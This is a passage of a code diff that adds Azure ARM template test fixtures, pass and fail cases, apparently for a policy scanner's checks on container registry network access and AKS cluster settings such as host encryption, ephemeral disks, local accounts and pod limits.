+        "value": "[reference(resourceId('Microsoft.ContainerRegistry/registries',parameters('acrName')),'2019-12-01').loginServer]",
+        "type": "string"
+      }
+    }
+}
+    ]
+   }
+
diff --git a/tests/arm/checks/resource/example_ACRPublicNetworkAccessDisabled/fail.json b/tests/arm/checks/resource/example_ACRPublicNetworkAccessDisabled/fail.json
new file mode 100644
index 00000000000..7b9d2ce460f
--- /dev/null
+++ b/tests/arm/checks/resource/example_ACRPublicNetworkAccessDisabled/fail.json
@@ -0,0 +1,39 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.1",
+  "resources": [
+    {
+      "apiVersion": "2019-05-01",
+      "type": "Microsoft.ContainerRegistry/registries",
+      "name": "fail",
+      "location": "[resourceGroup().location]",
+      "sku": {
+        "name": "Basic"
+      },
+      "properties": {
+        "adminUserEnabled": true,
+        "anonymousPullEnabled": true,
+        "dataEndpointEnabled": true,
+        "encryption": {
+          "keyVaultProperties": {
+            "identity": "someIdentity",
+            "keyIdentifier": "someKeyIdentifier"
+          },
+          "status": "enabled"
+        },
+        "networkRuleBypassOptions": "AzureServices",
+        "networkRuleSet": {
+          "defaultAction": "Deny",
+          "ipRules": [
+            {
+              "action": "Allow",
+              "value": "127.0.0.1"
+            }
+          ]
+        },
+         "publicNetworkAccess":"Enabled"
+      }
+
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_ACRPublicNetworkAccessDisabled/pass.json b/tests/arm/checks/resource/example_ACRPublicNetworkAccessDisabled/pass.json
new file mode 100644
index 00000000000..a53b36290aa
--- /dev/null
+++ b/tests/arm/checks/resource/example_ACRPublicNetworkAccessDisabled/pass.json
@@ -0,0 +1,38 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.1",
+  "resources": [
+    {
+      "apiVersion": "2019-05-01",
+      "type": "Microsoft.ContainerRegistry/registries",
+      "name": "pass",
+      "location": "[resourceGroup().location]",
+      "sku": {
+        "name": "Standard"
+      },
+      "properties": {
+        "adminUserEnabled": true,
+        "anonymousPullEnabled": true,
+        "dataEndpointEnabled": true,
+        "encryption": {
+          "keyVaultProperties": {
+            "identity": "someIdentity",
+            "keyIdentifier": "someKeyIdentifier"
+          },
+          "status": "enabled"
+        },
+        "networkRuleBypassOptions": "AzureServices",
+        "networkRuleSet": {
+          "defaultAction": "Deny",
+          "ipRules": [
+            {
+              "action": "Allow",
+              "value": "127.0.0.1"
+            }
+          ]
+        },
+      "publicNetworkAccess": "Disabled"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/fail1.json b/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/fail1.json
new file mode 100644
index 00000000000..f9e72350be3
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/fail1.json
@@ -0,0 +1,34 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.ContainerService/managedClusters",
+      "apiVersion": "2024-03-02",
+      "name": "fail1",
+      "location": "East US",
+      "properties": {
+        "vmSize": "Standard_DS2_v2",
+        "count": 1,
+        "tags": {
+          "Enviroment": "Production"
+        },
+        "agentPoolProfiles": [
+          {
+            "name": "default",
+            "enableEncryptionAtHost": false,
+            "vmSize": "Standard_E4ads_v5",
+            "osDiskType": "Ephemeral",
+            "availabilityZones": [1, 2, 3],
+            "type": "VirtualMachineScaleSets",
+            "maxCount": 6,
+            "minCount": 2,
+            "enableAutoScaling": true,
+            "orchestratorVersion": "[parameters('kubernetesVersion')]",
+            "vnetSubnetID": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{vnetName}/subnets/{subnetName}"
+          }
+        ]
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/fail2.json b/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/fail2.json
new file mode 100644
index 00000000000..710ac742049
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/fail2.json
@@ -0,0 +1,31 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.ContainerService/managedClusters",
+      "apiVersion": "2024-03-02",
+      "name": "fail2",
+      "location": "East US",
+      "properties": {
+        "vmSize": "Standard_DS2_v2",
+        "count": 1,
+        "agentPoolProfiles": [
+          {
+            "name": "default",
+            "vmSize": "Standard_E4ads_v5",
+            "osDiskType": "Ephemeral",
+            "availabilityZones": [1, 2, 3],
+            "onlyCriticalAddonsEnabled": true,
+            "type": "VirtualMachineScaleSets",
+            "vnetSubnetID": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{vnetName}/subnets/{subnetName}",
+            "enableAutoScaling": true,
+            "maxCount": 6,
+            "minCount": 2,
+            "orchestratorVersion": "[parameters('kubernetesVersion')]"
+          }
+        ]
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/failA1.json b/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/failA1.json
new file mode 100644
index 00000000000..bb4f2b596e4
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/failA1.json
@@ -0,0 +1,19 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.ContainerService/managedClusters/agentPools",
+      "apiVersion": "2014-04-01",
+      "name": "failA1",
+      "properties": {
+        "count": 1,
+        "enableEncryptionAtHost": false,
+        "vmSize": "Standard_DS2_v2",
+        "tags": {
+          "Environment": "Production"
+        }
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/failA2.json b/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/failA2.json
new file mode 100644
index 00000000000..02fc4247af3
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/failA2.json
@@ -0,0 +1,18 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.ContainerService/managedClusters/agentPools",
+      "apiVersion": "2014-04-01",
+      "name": "failA2",
+      "properties": {
+        "nodeCount": 1,
+        "vmSize": "Standard_DS2_v2",
+        "tags": {
+          "Environment": "Production"
+        }
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/pass.json b/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/pass.json
new file mode 100644
index 00000000000..ae0e8bf76c5
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/pass.json
@@ -0,0 +1,35 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.ContainerService/managedClusters",
+      "apiVersion": "2024-03-02",
+      "name": "pass",
+      "location": "East US",
+      "properties": {
+        "vmSize": "Standard_DS2_v2",
+        "nodeCount": 1,
+        "agentPoolProfiles": [
+          {
+            "name": "default",
+            "enableEncryptionAtHost": true,
+            "vmSize": "Standard_E4ads_v5",
+            "osDiskType": "Ephemeral",
+            "availabilityZones": [
+              1,
+              2,
+              3
+            ],
+            "onlyCriticalAddOns": true,
+            "type": "VirtualMachineScaleSets",
+            "maxCount": 6,
+            "minCount": 2,
+            "orchestratorVersion": "[parameters('kubernetesVersion')]",
+            "vnetSubnetID": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{vnetName}/subnets/{subnetName}"
+          }
+        ]
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/passA.json b/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/passA.json
new file mode 100644
index 00000000000..1b45a98cd2a
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/passA.json
@@ -0,0 +1,20 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.ContainerService/managedClusters/agentPools",
+      "apiVersion": "2014-04-01",
+      "name": "passA",
+      "properties": {
+        "count": 1,
+        "enableEncryptionAtHost": true,
+        "orchestratorVersion": "[parameters('kubernetesVersion')]",
+        "vmSize": "Standard_DS2_v2",
+        "tags": {
+          "Environment": "Production"
+        }
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AKSEphemeralOSDisks/fail.json b/tests/arm/checks/resource/example_AKSEphemeralOSDisks/fail.json
new file mode 100644
index 00000000000..304e6eeb875
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSEphemeralOSDisks/fail.json
@@ -0,0 +1,36 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.ContainerService/managedClusters",
+      "apiVersion": "2018-06-01",
+      "name": "fail",
+      "properties": {
+        "vmSize": "Standard_DS2_v2",
+        "count": 1,
+        "tags": {
+          "Environment": "Production"
+        },
+        "agentPoolProfiles": [
+          {
+            "name": "default",
+            "enableEncryptionAtHost": true,
+            "vmSize": "Standard_E4ads_v5",
+            "availabilityZones": [
+              1,
+              2,
+              3
+            ],
+            "type": "VirtualMachineScaleSets",
+            "vnetSubnetID": "",
+            "enableAutoScaling": true,
+            "maxCount": 6,
+            "minCount": 2,
+            "orchestratorVersion": ""
+          }
+        ]
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AKSEphemeralOSDisks/fail2.json b/tests/arm/checks/resource/example_AKSEphemeralOSDisks/fail2.json
new file mode 100644
index 00000000000..a289fb2a7b4
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSEphemeralOSDisks/fail2.json
@@ -0,0 +1,38 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.ContainerService/managedClusters",
+      "apiVersion": "2018-06-01",
+      "name": "fail2",
+      "properties": {
+        "vmSize": "Standard_DS2_v2",
+        "count": 1,
+        "osDiskType": "Managed",
+        "tags": {
+          "Environment": "Production"
+        },
+        "agentPoolProfiles": [
+          {
+            "name": "default",
+            "enableEncryptionAtHost": true,
+            "vmSize": "Standard_E4ads_v5",
+            "osDiskType": "Managed",
+            "availabilityZones": [
+              1,
+              2,
+              3
+            ],
+            "type": "VirtualMachineScaleSets",
+            "vnetSubnetID": "",
+            "enableAutoScaling": true,
+            "maxCount": 6,
+            "minCount": 2,
+            "orchestratorVersion": ""
+          }
+        ]
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AKSEphemeralOSDisks/pass.json b/tests/arm/checks/resource/example_AKSEphemeralOSDisks/pass.json
new file mode 100644
index 00000000000..880fe74a757
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSEphemeralOSDisks/pass.json
@@ -0,0 +1,35 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.ContainerService/managedClusters",
+      "apiVersion": "2018-06-01",
+      "name": "pass",
+      "properties": {
+        "osDiskType": "Ephemeral",
+        "vmSize": "Standard_DS2_v2",
+        "count": 1,
+        "agentPoolProfiles": [
+          {
+            "name": "default",
+            "osDiskType": "Ephemeral",
+            "enableEncryptionAtHost": true,
+            "vmSize": "Standard_E4ads_v5",
+            "availabilityZones": [
+              1,
+              2,
+              3
+            ],
+            "type": "VirtualMachineScaleSets",
+            "vnetSubnetID": "",
+            "enableAutoScaling": true,
+            "maxCount": 6,
+            "minCount": 2,
+            "orchestratorVersion": ""
+          }
+        ]
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AKSLocalAdminDisabled/fail.json b/tests/arm/checks/resource/example_AKSLocalAdminDisabled/fail.json
new file mode 100644
index 00000000000..3239389cd30
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSLocalAdminDisabled/fail.json
@@ -0,0 +1,27 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.ContainerService/managedClusters",
+      "apiVersion": "2018-06-01",
+      "name": "fail",
+      "properties": {
+        "resourceType": "Microsoft.ContainerService/managedClusters",
+        "agentPoolProfiles": [
+          {
+            "name": "default",
+            "count": 1,
+            "vmSize": "Standard_D2_v2"
+          }
+        ],
+        "identity": {
+          "type": "SystemAssigned"
+        }
+      },
+      "tags": {
+        "Environment": "Production"
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AKSLocalAdminDisabled/fail2.json b/tests/arm/checks/resource/example_AKSLocalAdminDisabled/fail2.json
new file mode 100644
index 00000000000..d4abc0483ac
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSLocalAdminDisabled/fail2.json
@@ -0,0 +1,28 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.ContainerService/managedClusters",
+      "apiVersion": "2018-06-01",
+      "name": "fail2",
+      "properties": {
+        "resourceType": "Microsoft.ContainerService/managedClusters",
+        "agentPoolProfiles": [
+          {
+            "name": "default",
+            "count": 1,
+            "vmSize": "Standard_D2_v2"
+          }
+        ],
+        "identity": {
+          "type": "SystemAssigned"
+        },
+        "disableLocalAccounts": false
+      },
+      "tags": {
+        "Environment": "Production"
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AKSLocalAdminDisabled/pass.json b/tests/arm/checks/resource/example_AKSLocalAdminDisabled/pass.json
new file mode 100644
index 00000000000..299d0fc3e80
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSLocalAdminDisabled/pass.json
@@ -0,0 +1,28 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.ContainerService/managedClusters",
+      "apiVersion": "2018-06-01",
+      "name": "pass",
+      "properties": {
+        "resourceType": "Microsoft.ContainerService/managedClusters",
+        "agentPoolProfiles": [
+          {
+            "name": "default",
+            "count": 1,
+            "vmSize": "Standard_D2_v2"
+          }
+        ],
+        "identity": {
+          "type": "SystemAssigned"
+        },         
+        "disableLocalAccounts": true
+      },
+      "tags": {
+        "Environment": "Production"
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AKSMaxPodsMinimum/agentPoolProfiles_with_maxPods_fail4.json b/tests/arm/checks/resource/example_AKSMaxPodsMinimum/agentPoolProfiles_with_maxPods_fail4.json
new file mode 100644
index 00000000000..e8b2f7c39db
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSMaxPodsMinimum/agentPoolProfiles_with_maxPods_fail4.json
@@ -0,0 +1,134 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.5.6.12127",
+      "templateHash": "12705365244308198684"
+    }
+  },
+  "parameters": {
+    "aksClusterName": {
+      "type": "string",
+      "defaultValue": "aks101cluster-vmss",
+      "metadata": {
+        "description": "The name of the Managed Cluster resource."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "The location of AKS resource."
+      }
+    },
+    "dnsPrefix": {
+      "type": "string",
+      "metadata": {
+        "description": "Optional DNS prefix to use with hosted Kubernetes API server FQDN."
+      }
+    },
+    "osDiskSizeGB": {
+      "type": "int",
+      "defaultValue": 0,
+      "maxValue": 1023,
+      "minValue": 0,
+      "metadata": {
+        "description": "Disk size (in GiB) to provision for each of the agent pool nodes. This value ranges from 0 to 1023. Specifying 0 will apply the default disk size for that agentVMSize."
+      }
+    },
+    "agentCount": {
+      "type": "int",
+      "defaultValue": 3,
+      "maxValue": 100,
+      "minValue": 1,
+      "metadata": {
+        "description": "The number of nodes for the cluster. 1 Node is enough for Dev/Test and minimum 3 nodes, is recommended for Production"
+      }
+    },
+    "agentVMSize": {
+      "type": "string",
+      "defaultValue": "Standard_D2s_v3",
+      "metadata": {
+        "description": "The size of the Virtual Machine."
+      }
+    },
+    "osType": {
+      "type": "string",
+      "defaultValue": "Linux",
+      "allowedValues": [
+        "Linux",
+        "Windows"
+      ],
+      "metadata": {
+        "description": "The type of operating system."
+      }
+    }
+  },
+  "resources": [
+             {
+            "type": "Microsoft.ContainerService/managedClusters",
+            "apiVersion": "2020-03-01",
+            "name": "agentPoolProfiles_with_maxPods_fail4",
+            "location": "[parameters('location')]",
+            "sku": {
+                "name": "Basic",
+                "tier": "Free"
+            },
+            "identity": {
+                "type": "SystemAssigned"
+            },
+            "properties": {
+                "kubernetesVersion": "[parameters('kubernetesVersion')]",
+                "dnsPrefix": "[variables('dnsPrefix')]",
+                "agentPoolProfiles":[
+                    {
+                        "name": "agentpool",
+                        "count": 3,
+                        "vmSize": "[parameters('agentVMSize')]",
+                        "osDiskSizeGB": "[parameters('osDiskSizeGB')]",
+                        "maxPods": 28,
+                        "type": "VirtualMachineScaleSets",
+                        "orchestratorVersion": "[parameters('kubernetesVersion')]",
+                        "mode": "System",
+                        "osType": "Linux"
+                    }
+                  ]
+                ,
+                "linuxProfile": {
+                    "adminUsername": "[parameters('linuxAdminUsername')]",
+                    "ssh": {
+                        "publicKeys": [
+                            {
+                                "keyData": "[parameters('sshRSAPublicKey')]"
+                            }
+                        ]
+                    }
+                },
+                "servicePrincipalProfile": {
+                    "clientId": "msi"
+                },
+                "nodeResourceGroup": "[concat('MC_', resourceGroup().name,'_', parameters('clusterName'), '_',parameters('location'))]",
+                "enableRBAC": true,
+                "networkProfile": {
+                    "networkPlugin": "kubenet",
+                    "loadBalancerSku": "Basic",
+                    "podCidr": "[parameters('podCidr')]",
+                    "serviceCidr": "[parameters('serviceCidr')]",
+                    "dnsServiceIP": "[parameters('dnsServiceIP')]",
+                    "dockerBridgeCidr": "[parameters('dockerBridgeCidr')]",
+                    "outboundType": "loadBalancer"
+                }
+            }
+        }
+
+
+  ],
+  "outputs": {
+    "controlPlaneFQDN": {
+      "type": "string",
+      "value": "[reference(resourceId('Microsoft.ContainerService/managedClusters', parameters('aksClusterName'))).fqdn]"
+    }
+  }
+}
diff --git a/tests/arm/checks/resource/example_AKSMaxPodsMinimum/agentPoolProfiles_with_maxPods_pass.json b/tests/arm/checks/resource/example_AKSMaxPodsMinimum/agentPoolProfiles_with_maxPods_pass.json
new file mode 100644
index 00000000000..4184de4924f
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSMaxPodsMinimum/agentPoolProfiles_with_maxPods_pass.json
@@ -0,0 +1,132 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.5.6.12127",
+      "templateHash": "12705365244308198684"
+    }
+  },
+  "parameters": {
+    "aksClusterName": {
+      "type": "string",
+      "defaultValue": "aks101cluster-vmss",
+      "metadata": {
+        "description": "The name of the Managed Cluster resource."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "The location of AKS resource."
+      }
+    },
+    "dnsPrefix": {
+      "type": "string",
+      "metadata": {
+        "description": "Optional DNS prefix to use with hosted Kubernetes API server FQDN."
+      }
+    },
+    "osDiskSizeGB": {
+      "type": "int",
+      "defaultValue": 0,
+      "maxValue": 1023,
+      "minValue": 0,
+      "metadata": {
+        "description": "Disk size (in GiB) to provision for each of the agent pool nodes. This value ranges from 0 to 1023. Specifying 0 will apply the default disk size for that agentVMSize."
+      }
+    },
+    "agentCount": {
+      "type": "int",
+      "defaultValue": 3,
+      "maxValue": 100,
+      "minValue": 1,
+      "metadata": {
+        "description": "The number of nodes for the cluster. 1 Node is enough for Dev/Test and minimum 3 nodes, is recommended for Production"
+      }
+    },
+    "agentVMSize": {
+      "type": "string",
+      "defaultValue": "Standard_D2s_v3",
+      "metadata": {
+        "description": "The size of the Virtual Machine."
+      }
+    },
+    "osType": {
+      "type": "string",
+      "defaultValue": "Linux",
+      "allowedValues": [
+        "Linux",
+        "Windows"
+      ],
+      "metadata": {
+        "description": "The type of operating system."
+      }
+    }
+  },
+  "resources": [
+
+              {
+            "type": "Microsoft.ContainerService/managedClusters",
+            "apiVersion": "2020-03-01",
+            "name": "agentPoolProfiles_with_maxPods_pass",
+            "location": "[parameters('location')]",
+            "sku": {
+                "name": "Basic",
+                "tier": "Free"
+            },
+            "identity": {
+                "type": "SystemAssigned"
+            },
+            "properties": {
+                "kubernetesVersion": "[parameters('kubernetesVersion')]",
+                "dnsPrefix": "[variables('dnsPrefix')]",
+                "agentPoolProfiles":[
+                    {
+                        "name": "agentpool",
+                        "count": 3,
+                        "vmSize": "[parameters('agentVMSize')]",
+                        "osDiskSizeGB": "[parameters('osDiskSizeGB')]",
+                        "maxPods": 51,
+                        "type": "VirtualMachineScaleSets",
+                        "orchestratorVersion": "[parameters('kubernetesVersion')]",
+                        "mode": "System",
+                        "osType": "Linux"
+                    }
+                  ],
+                "linuxProfile": {
+                    "adminUsername": "[parameters('linuxAdminUsername')]",
+                    "ssh": {
+                        "publicKeys": [
+                            {
+                                "keyData": "[parameters('sshRSAPublicKey')]"
+                            }
+                        ]
+                    }
+                },
+                "servicePrincipalProfile": {
+                    "clientId": "msi"
+                },
+                "nodeResourceGroup": "[concat('MC_', resourceGroup().name,'_', parameters('clusterName'), '_',parameters('location'))]",
+                "enableRBAC": true,
+                "networkProfile": {
+                    "networkPlugin": "kubenet",
+                    "loadBalancerSku": "Basic",
+                    "podCidr": "[parameters('podCidr')]",
+                    "serviceCidr": "[parameters('serviceCidr')]",
+                    "dnsServiceIP": "[parameters('dnsServiceIP')]",
+                    "dockerBridgeCidr": "[parameters('dockerBridgeCidr')]",
+                    "outboundType": "loadBalancer"
+                }
+            }
+        }
+  ],
+  "outputs": {
+    "controlPlaneFQDN": {
+      "type": "string",
+      "value": "[reference(resourceId('Microsoft.ContainerService/managedClusters', parameters('aksClusterName'))).fqdn]"
+    }
+  }
+}
diff --git a/tests/arm/checks/resource/example_AKSMaxPodsMinimum/agentPoolProfiles_without_maxPods_fail3.json b/tests/arm/checks/resource/example_AKSMaxPodsMinimum/agentPoolProfiles_without_maxPods_fail3.json
new file mode 100644
index 00000000000..e335dd2a140
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSMaxPodsMinimum/agentPoolProfiles_without_maxPods_fail3.json
@@ -0,0 +1,133 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.5.6.12127",
+      "templateHash": "12705365244308198684"
+    }
+  },
+  "parameters": {
+    "aksClusterName": {
+      "type": "string",
+      "defaultValue": "aks101cluster-vmss",
+      "metadata": {
+        "description": "The name of the Managed Cluster resource."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "The location of AKS resource."
+      }
+    },
+    "dnsPrefix": {
+      "type": "string",
+      "metadata": {
+        "description": "Optional DNS prefix to use with hosted Kubernetes API server FQDN."
+      }
+    },
+    "osDiskSizeGB": {
+      "type": "int",
+      "defaultValue": 0,
+      "maxValue": 1023,
+      "minValue": 0,
+      "metadata": {
+        "description": "Disk size (in GiB) to provision for each of the agent pool nodes. This value ranges from 0 to 1023. Specifying 0 will apply the default disk size for that agentVMSize."
+      }
+    },
+    "agentCount": {
+      "type": "int",
+      "defaultValue": 3,
+      "maxValue": 100,
+      "minValue": 1,
+      "metadata": {
+        "description": "The number of nodes for the cluster. 1 Node is enough for Dev/Test and minimum 3 nodes, is recommended for Production"
+      }
+    },
+    "agentVMSize": {
+      "type": "string",
+      "defaultValue": "Standard_D2s_v3",
+      "metadata": {
+        "description": "The size of the Virtual Machine."
+      }
+    },
+    "osType": {
+      "type": "string",
+      "defaultValue": "Linux",
+      "allowedValues": [
+        "Linux",
+        "Windows"
+      ],
+      "metadata": {
+        "description": "The type of operating system."
+      }
+    }
+  },
+  "resources": [
+              {
+            "type": "Microsoft.ContainerService/managedClusters",
+            "apiVersion": "2020-03-01",
+            "name": "agentPoolProfiles_without_maxPods_fail3",
+            "location": "[parameters('location')]",
+            "sku": {
+                "name": "Basic",
+                "tier": "Free"
+            },
+            "identity": {
+                "type": "SystemAssigned"
+            },
+            "properties": {
+                "kubernetesVersion": "[parameters('kubernetesVersion')]",
+                "dnsPrefix": "[variables('dnsPrefix')]",
+                "agentPoolProfiles":[
+                    {
+                        "name": "agentpool",
+                        "count": 3,
+                        "vmSize": "[parameters('agentVMSize')]",
+                        "osDiskSizeGB": "[parameters('osDiskSizeGB')]",
+                        "type": "VirtualMachineScaleSets",
+                        "orchestratorVersion": "[parameters('kubernetesVersion')]",
+                        "mode": "System",
+                        "osType": "Linux"
+                    }
+                  ]
+                ,
+                "linuxProfile": {
+                    "adminUsername": "[parameters('linuxAdminUsername')]",
+                    "ssh": {
+                        "publicKeys": [
+                            {
+                                "keyData": "[parameters('sshRSAPublicKey')]"
+                            }
+                        ]
+                    }
+                },
+                "servicePrincipalProfile": {
+                    "clientId": "msi"
+                },
+                "nodeResourceGroup": "[concat('MC_', resourceGroup().name,'_', parameters('clusterName'), '_',parameters('location'))]",
+                "enableRBAC": true,
+                "networkProfile": {
+                    "networkPlugin": "kubenet",
+                    "loadBalancerSku": "Basic",
+                    "podCidr": "[parameters('podCidr')]",
+                    "serviceCidr": "[parameters('serviceCidr')]",
+                    "dnsServiceIP": "[parameters('dnsServiceIP')]",
+                    "dockerBridgeCidr": "[parameters('dockerBridgeCidr')]",
+                    "outboundType": "loadBalancer"
+                }
+            }
+        }
+
+
+  ],
+  "outputs": {
+    "controlPlaneFQDN": {
+      "type": "string",
+      "value": "[reference(resourceId('Microsoft.ContainerService/managedClusters', parameters('aksClusterName'))).fqdn]"
+    }
+  }
+}
diff --git a/tests/arm/checks/resource/example_AKSMaxPodsMinimum/properties_with_maxPods_fail2.json b/tests/arm/checks/resource/example_AKSMaxPodsMinimum/properties_with_maxPods_fail2.json
new file mode 100644
index 00000000000..9a9a63116b6
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSMaxPodsMinimum/properties_with_maxPods_fail2.json
@@ -0,0 +1,97 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.5.6.12127",
+      "templateHash": "12705365244308198684"
+    }
+  },
+  "parameters": {
+    "aksClusterName": {
+      "type": "string",
+      "defaultValue": "aks101cluster-vmss",
+      "metadata": {
+        "description": "The name of the Managed Cluster resource."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "The location of AKS resource."
+      }
+    },
+    "dnsPrefix": {
+      "type": "string",
+      "metadata": {
+        "description": "Optional DNS prefix to use with hosted Kubernetes API server FQDN."
+      }
+    },
+    "osDiskSizeGB": {
+      "type": "int",
+      "defaultValue": 0,
+      "maxValue": 1023,
+      "minValue": 0,
+      "metadata": {
+        "description": "Disk size (in GiB) to provision for each of the agent pool nodes. This value ranges from 0 to 1023. Specifying 0 will apply the default disk size for that agentVMSize."
+      }
+    },
+    "agentCount": {
+      "type": "int",
+      "defaultValue": 3,
+      "maxValue": 100,
+      "minValue": 1,
+      "metadata": {
+        "description": "The number of nodes for the cluster. 1 Node is enough for Dev/Test and minimum 3 nodes, is recommended for Production"
+      }
+    },
+    "agentVMSize": {
+      "type": "string",
+      "defaultValue": "Standard_D2s_v3",
+      "metadata": {
+        "description": "The size of the Virtual Machine."
+      }
+    },
+    "osType": {
+      "type": "string",
+      "defaultValue": "Linux",
+      "allowedValues": [
+        "Linux",
+        "Windows"
+      ],
+      "metadata": {
+        "description": "The type of operating system."
+      }
+    }
+  },
+  "resources": [
+      {
+            "type": "Microsoft.ContainerService/managedClusters/agentPools",
+            "apiVersion": "2020-03-01",
+            "name": "properties_with_maxPods_fail2",
+            "dependsOn": [
+                "[resourceId('Microsoft.ContainerService/managedClusters', parameters('clusterName'))]"
+            ],
+            "properties": {
+                "count": "[parameters('agentCount')]",
+                "vmSize": "[parameters('agentVMSize')]",
+                "osDiskSizeGB": "[parameters('osDiskSizeGB')]",
